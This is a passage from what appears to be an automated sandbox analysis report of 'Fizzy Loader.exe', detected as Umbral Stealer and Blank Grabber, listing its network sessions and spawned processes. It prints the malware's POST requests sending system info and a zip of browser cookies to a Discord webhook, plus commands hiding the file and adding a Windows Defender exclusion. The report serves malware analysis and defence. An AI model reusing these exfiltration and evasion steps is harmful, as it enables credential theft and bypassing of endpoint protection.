                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET1.1.1.1192.168.2.50x3d46No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET1.1.1.1192.168.2.50x3d46No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • discord.com
                                                                                                                                                          • ip-api.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.549705208.95.112.1801708C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 31, 2024 00:49:54.515573978 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                          Host: ip-api.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 31, 2024 00:49:55.065258026 CET175INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 30 Dec 2024 23:49:54 GMT
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Content-Length: 6
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Ttl: 60
                                                                                                                                                          X-Rl: 44
                                                                                                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                          Data Ascii: false


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.549807208.95.112.1801708C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 31, 2024 00:50:28.080804110 CET55OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                          Host: ip-api.com
                                                                                                                                                          Dec 31, 2024 00:50:28.581872940 CET381INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 30 Dec 2024 23:50:28 GMT
                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                          Content-Length: 204
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Ttl: 60
                                                                                                                                                          X-Rl: 44
                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.549939162.159.138.2324431708C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-30 23:50:51 UTC360OUTPOST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1
                                                                                                                                                          Accept: application/json
                                                                                                                                                          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                          Host: discord.com
                                                                                                                                                          Content-Length: 940
                                                                                                                                                          Expect: 100-continue
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-30 23:50:51 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                          2024-12-30 23:50:51 UTC940OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 38 35 35 32 37 31 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                                                                                                                                          Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 855271\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                                                                                                                                          2024-12-30 23:50:52 UTC1300INHTTP/1.1 404 Not Found
                                                                                                                                                          Date: Mon, 30 Dec 2024 23:50:51 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 45
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                          x-ratelimit-reset: 1735602653
                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sp9Xcu7jb8Q9TDFkNuyBO0qkdajgnAtBb3bX4ito3vUfs%2FksigpR1ayZMAFn8g9EekmaUitIT%2BBNEubbCHXb7TkaClq5s7zogJ%2BkBhMrsAPJMeIbueqSqYNVIa8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Set-Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                          Set-Cookie: _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8fa5ef3d8bec5e74-EWR
                                                                                                                                                          {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.549945162.159.138.2324431708C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-30 23:50:52 UTC531OUTPOST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1
                                                                                                                                                          Accept: application/json
                                                                                                                                                          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                          Content-Type: multipart/form-data; boundary="39cddf4a-0995-4cf8-bfa9-e03f655560dc"
                                                                                                                                                          Host: discord.com
                                                                                                                                                          Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000
                                                                                                                                                          Content-Length: 689332
                                                                                                                                                          Expect: 100-continue
                                                                                                                                                          2024-12-30 23:50:52 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                          2024-12-30 23:50:52 UTC40OUTData Raw: 2d 2d 33 39 63 64 64 66 34 61 2d 30 39 39 35 2d 34 63 66 38 2d 62 66 61 39 2d 65 30 33 66 36 35 35 35 36 30 64 63 0d 0a
                                                                                                                                                          Data Ascii: --39cddf4a-0995-4cf8-bfa9-e03f655560dc
                                                                                                                                                          2024-12-30 23:50:52 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-855271.zip; filename*=utf-8''Umbral-855271.zip
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 4d 96 9e 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                                                                                                                                          Data Ascii: PKMY*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 47 02 2f f9 e1 33 6f 4f 6f 55 30 7b 33 0c eb 6f 9f 90 9b d0 a3 f6 9d 03 f1 19 e1 fe b6 8d 56 00 1f 00 0d 2b 0b 2d 41 26 44 7a fd 97 cc 10 b2 a1 41 c8 f4 10 f1 d3 88 e5 dd 60 d1 bc 5a 06 0e 46 2a ce 0d 3c 19 c6 36 6c 7c a4 b6 d9 32 df c8 6d 22 65 73 93 aa aa 8b 83 c9 6b 0e dc 69 a9 bc 83 e9 94 ca 47 c1 e4 0d cf 47 8e 63 cc 94 c6 4e 1a 5e 1b 70 7b 3a 80 2d f3 4e 0e b5 13 6d 9a 79 3f f9 d6 2e e5 77 61 63 c6 f9 ad 8a cb eb ee 6a 73 d3 98 6d f2 f9 ef f8 2b fc 3f 93 59 28 8d 7f 71 68 fb 66 a4 f0 b7 17 05 08 bc 7d 23 a4 74 07 6a 9d 20 43 da ab 27 d6 94 3d 1e 0c 52 50 12 bf cd c5 34 c8 60 f8 09 ae db bb ef 17 f6 b6 9b 69 c0 88 c9 5a a0 b8 33 49 66 fa 07 cb 8d 54 52 76 91 64 1c 29 b5 97 48 17 99 1f ad f2 db dc 81 93 e0 12 95 04 6a 00 ec 86 27 ff a1 e1 ed c9 1e a4
                                                                                                                                                          Data Ascii: G/3oOoU0{3oV+-A&DzA`ZF*<6l|2m"eskiGGcN^p{:-Nmy?.wacjsm+?Y(qhf}#tj C'=RP4`iZ3IfTRvd)Hj'
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 9e f2 3d 62 03 d8 52 2f 7c 33 ca 88 90 0a 97 99 fc c9 23 3a a4 4b 8a 8b bb a1 22 0d d5 f1 0d ff 8f b2 dd 77 16 f8 e1 02 3e f5 2f 87 37 8a 27 01 4e f1 5f db a4 07 dc 7c e3 f2 91 7f 71 bd d1 5c a6 0e f8 2a 48 fe df 8a f6 31 f8 70 d7 8b be a8 4b 7e 44 b0 9c 08 94 28 8d e3 bf ff 4d 17 45 a6 f3 9f 96 a4 2b 1f d3 79 41 61 0e d7 ff 90 76 04 7d 68 7e 4b f8 38 81 3b 6f e8 0e b6 1a 3e fd 20 57 fe a7 4b 47 41 c0 85 f5 59 f5 c3 18 18 21 9a 30 2d 9d 0a 83 b9 80 ed bb 24 e9 d7 44 c1 2d 11 17 58 3c 94 d3 60 de ec a6 3c 90 d0 cd bf 89 fc eb 9d 8e d1 4b 09 0f f5 3e cc 7f 9a d3 80 3a 9f 86 49 50 dd bc 9e 8c f5 90 56 ff 1e dc 55 4b 92 c6 15 ce d1 26 49 b1 88 66 e8 83 ef 83 52 17 2f cb 29 df 99 f2 38 b1 eb 5e b9 8b 97 c4 5f b5 17 28 05 f7 89 40 65 a2 45 c0 4b 97 35 82 d7 9a
                                                                                                                                                          Data Ascii: =bR/|3#:K"w>/7'N_|q\*H1pK~D(ME+yAav}h~K8;o> WKGAY!0-$D-X<`<K>:IPVUK&IfR/)8^_(@eEK5
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 3a 30 4c ba f1 43 a1 20 e4 f2 48 df 80 a1 a0 8f b7 71 bf 70 d0 dd 79 ab 96 c3 c0 bd 69 ed a1 e1 f0 8d 5c 9e 39 b6 a6 04 03 e4 e5 ea 1d 8e 74 e9 28 4e 74 13 bb f7 24 2f 50 96 70 8c dd e3 7b f4 ea 73 f4 1b b7 97 d7 56 b8 73 3f 08 95 97 72 c1 ae 83 a9 57 d5 99 2f a3 9f 04 7d db f8 0f ee b9 bc 83 57 0a 7d b0 74 52 38 c1 a3 4e 3f 8e a6 dc 52 73 f8 e8 8d 54 7f 9f f7 74 39 41 e1 10 9e f9 1a 6c 17 42 39 45 d4 79 77 22 62 63 4d 93 33 c0 91 13 7f 9d e3 5c 64 6f 2f 17 6d 40 d8 a3 eb 1b 29 45 3f 4e 92 54 99 f5 44 24 5e df e5 e3 6d 53 ba 99 8c b9 90 dc 61 bb 4b 8e 85 08 49 05 fb 94 2f 93 44 51 d3 e6 56 b1 a7 a1 3b 05 3f 2c 60 e8 31 71 9b fd f9 95 f5 e0 87 4e 9f 36 fe f3 69 57 22 51 32 3d b7 93 28 94 e6 ca 9e 01 11 cf 3e 25 80 2f 98 e9 02 42 61 2f f1 ea db ed 64 dd 87
                                                                                                                                                          Data Ascii: :0LC Hqpyi\9t(Nt$/Pp{sVs?rW/}W}tR8N?RsTt9AlB9Eyw"bcM3\do/m@)E?NTD$^mSaKI/DQV;?,`1qN6iW"Q2=(>%/Ba/d
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 8f c2 8e 53 d2 22 33 62 c3 e0 fc 11 15 ff 59 d1 1a 90 94 a2 bf 20 fb a1 5f 64 61 65 bc d5 c3 67 79 d7 dd 52 ff ee ff 0b 7e 5e 4a 68 02 57 ab 58 a9 72 d5 3b 59 e3 83 1c f4 7e ac f2 5f f8 1a 0a 4e a5 d9 4c 57 4c 14 25 fc ad 16 97 85 e9 d7 ba bb 1c af 69 09 c8 d1 a7 9c fd 9f 58 00 8a f0 ec 07 af fe 38 ea 5a 1d 9c e4 1f fa b3 a6 34 3c eb ef 4c d8 1e d8 2c cf 8e be bb 27 50 73 11 ca d5 be 34 23 07 46 3e 9d cd 64 1f 34 74 86 80 d4 77 9d 38 72 54 1a 02 b5 fe 9a b3 50 bd df f8 c3 87 27 22 46 66 39 30 da 76 76 e8 95 d3 73 a4 29 f0 c0 7d c3 a4 d6 68 6b 9d a3 83 2d 09 28 57 55 8a 57 70 27 82 b7 6e ab 0f 49 9d 0b f9 e1 99 08 5c f6 88 f2 e5 67 1a f5 ff 35 9c 99 b1 72 76 3d f3 d6 ee 90 78 06 e6 42 6f eb fa 17 ce 0e 1b 29 37 be d0 ba 38 f7 aa 64 2f cd 6a 21 70 b5 d4 b9
                                                                                                                                                          Data Ascii: S"3bY _daegyR~^JhWXr;Y~_NLWL%iX8Z4<L,'Ps4#F>d4tw8rTP'"Ff90vvs)}hk-(WUWp'nI\g5rv=xBo)78d/j!p
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 30 70 81 6f 3c 93 c3 e2 bc f5 88 e2 5c 5a 58 f9 07 94 af d4 44 86 f6 41 4d 40 b2 4f 87 4f 34 25 b8 c2 70 82 65 95 17 d9 c0 37 4a b9 0b bd 93 04 6d b7 f9 f0 d8 1f 4c 3e f7 64 86 eb 06 63 4d f2 90 1a 99 9e 50 e7 f9 98 44 8b a4 8b 4c fe 84 85 b7 94 ac 73 48 14 7e 61 3c 46 90 7f 86 4a f8 c5 d5 87 5c 10 fc 67 5c 3a fd 7a 54 66 62 5e c3 de 54 d8 42 a0 65 af 1e 9b e7 61 ce 57 87 55 d2 37 06 7d 01 55 c1 bf 28 4e da bf b0 17 26 e2 f2 93 f1 f0 f8 e1 47 5d e7 d7 75 4a d4 51 64 a2 24 27 a1 7d 7e af 32 92 69 7f f8 21 f2 7b 6f 1b 31 27 a5 a7 69 92 9c 3c 4a ff 89 00 1e 2e f9 b9 d6 2a ce f7 37 60 c8 b7 8e 13 62 b3 b1 14 3e 5a c3 81 d9 7a bf fc b4 ee 51 db 89 e5 2c 7d fe 8c 52 6f 7b ee 08 52 17 88 16 fb bf f4 9f cc b2 9b 8a 47 a9 48 04 93 77 dc a0 68 ea b4 13 b5 4e be 35
                                                                                                                                                          Data Ascii: 0po<\ZXDAM@OO4%pe7JmL>dcMPDLsH~a<FJ\g\:zTfb^TBeaWU7}U(N&G]uJQd$'}~2i!{o1'i<J.*7`b>ZzQ,}Ro{RGHwhN5
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: f4 41 24 d5 1e 6b af bb 3c 39 ff 09 3b ee f1 51 9c fb fd 18 76 5c df 58 2d 91 f6 42 77 6b 3f a0 12 52 19 56 9e 35 09 db 9d 17 72 77 b7 03 ff c2 86 0e aa 4a f3 e7 96 a7 95 6c 88 51 91 c9 5d 25 16 e7 61 1e 44 c1 f0 dd e1 27 1e 1e 03 06 4e ee 6b 16 83 39 0b b8 be 0e 87 9f a2 f1 78 69 50 62 a9 d1 6c 98 b9 d8 4b 16 31 5a 54 e0 ea b7 fa 73 dc eb 49 a0 25 ef 6b c1 7b 9c 45 bd 8f d6 95 40 42 81 89 5a ef 02 05 b4 b9 13 75 e6 77 84 bc ad c0 8a e0 7e 6c 20 5c c6 8e 06 f2 60 4b fa 1b cc 10 4e c6 28 68 5c 17 66 f2 25 f9 27 96 e8 2d b1 38 6b 63 8b 12 c4 a4 f4 5b 31 78 a9 e7 89 42 ed 6b 25 b6 df ad 7e 96 17 59 83 af ff 4d 68 b6 de 14 2a 31 53 35 d3 77 af 15 18 30 08 b0 a0 58 cd 45 07 62 a3 32 31 6a b7 f3 c4 82 7a 44 30 5d 25 00 84 b2 59 2c d8 63 f0 e3 65 10 a9 57 5f a8
                                                                                                                                                          Data Ascii: A$k<9;Qv\X-Bwk?RV5rwJlQ]%aD'Nk9xiPblK1ZTsI%k{E@BZuw~l \`KN(h\f%'-8kc[1xBk%~YMh*1S5w0XEb21jzD0]%Y,ceW_
                                                                                                                                                          2024-12-30 23:50:52 UTC16355OUTData Raw: 0b b6 25 c9 53 12 d9 c4 7d 15 2f 3d 17 5a 62 9c e3 2f 84 8d 39 df ae 8b 9c d3 72 ad 4a 43 97 e8 f9 b6 99 1d 0c 06 fd e5 ae bf 40 2b bf 90 8a 79 bd e5 e7 b1 62 b3 fe 23 d8 23 f8 7a bb 31 f2 dc 60 4d 47 4a a2 a8 93 02 79 c4 27 b0 6a 7d fa f4 2b 56 47 69 5e 86 03 e6 74 f1 f8 cf f1 ad 12 0a b3 98 73 ee 5b e9 ae 7f f6 90 34 4a f3 fb 9b 3a ed 23 a5 9f f5 7b a3 33 1c 86 7d be b8 dd c9 bf a7 c7 f8 f3 55 42 05 73 a8 f4 86 a7 ff 4b 2b 97 e3 5b e4 f3 70 a3 b5 cd f8 c6 a3 dd 61 63 69 0a a2 0d c9 ef a1 30 81 b7 12 e6 66 73 8a 7b b5 ee c6 90 e6 08 c8 a4 26 cc 9c 12 7a 34 39 2c 3b 6c f8 ab 02 ec 86 f6 9d d7 0c 07 88 fb ff 55 12 2b 71 31 8a 63 57 4e 5c 6a fe f3 f9 c1 b1 18 d7 40 9d d8 3c bc f2 ab 30 59 ba 74 9c dc 4b 8c 75 d4 75 c5 1d f7 76 48 4e 1a 36 fc e0 4b 41 d1 36
                                                                                                                                                          Data Ascii: %S}/=Zb/9rJC@+yb##z1`MGJy'j}+VGi^ts[4J:#{3}UBsK+[paci0fs{&z49,;lU+q1cWN\j@<0YtKuuvHN6KA6
                                                                                                                                                          2024-12-30 23:50:53 UTC1009INHTTP/1.1 404 Not Found
                                                                                                                                                          Date: Mon, 30 Dec 2024 23:50:53 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 45
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                          x-ratelimit-reset: 1735602654
                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3sFzqoe8yR%2FjHoxNFvxHpwyMrJIJ3N3abOydo%2FwysoygHPEGkIUD1tZAEr%2FMwcB9n0ozg4B6R7vHwken%2Ftia5kGsgqjLNPZ4iQ7Hx2bKqehRdraR9S34%2Fs30d8I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8fa5ef433d397c84-EWR
                                                                                                                                                          {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:18:49:50
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Fizzy Loader.exe"
                                                                                                                                                          Imagebase:0x172aed80000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:B56AF795F8B7EDC6F35A9E905921ED0E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:18:49:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:18:49:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                                                                                                                                                          Imagebase:0x7ff613180000
                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
